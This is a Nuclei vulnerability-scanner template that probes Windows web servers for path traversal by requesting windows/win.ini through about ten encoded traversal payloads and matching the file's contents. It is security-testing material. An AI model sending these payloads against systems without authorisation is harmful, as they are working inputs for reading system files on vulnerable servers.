nuclei-templates/vulnerabilities/generic/generic-windows-lfi.yaml

39 lines
1.5 KiB
YAML

id: generic-windows-lfi
info:
name: Windows - Local File Inclusion
author: mesaglio,sushantkamble
severity: high
description: Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: azure,windows,lfi,generic
requests:
- method: GET
path:
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
- "{{BaseURL}}/./../../../../../../../../../../windows/win.ini"
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
- "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
stop-at-first-match: true
matchers:
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
# Enhanced by mp on 2022/07/22